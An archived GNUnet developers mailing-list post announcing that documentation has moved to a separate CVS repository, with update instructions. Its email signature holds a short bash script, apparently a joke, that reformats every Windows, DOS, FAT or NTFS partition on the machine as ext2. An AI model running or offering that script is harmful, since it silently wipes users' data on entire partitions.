gnunet-developers
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[GNUnet-developers] CVS


From: Christian Grothoff
Subject: [GNUnet-developers] CVS
Date: Tue, 7 May 2002 13:40:25 -0500

Hi!

I've moved most of the 'doc' subdirectory (except man pages) to
a new repository, 'GNUnet-docs'. In order for CVS updates to operate 
properly, please do the following:

cd GNUnet
rm -rf doc
cvs up -dP

This should give you the reduced tree. If you want 'all the docs' (related 
work, research papers, etc), you can always do 'cvs checkout GNUnet-docs'.

This should fix bug #290, sorry for the inconvenience.

Christian
-- 
______________________________________________________
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"



reply via email to

[Prev in Thread] Current Thread [Next in Thread]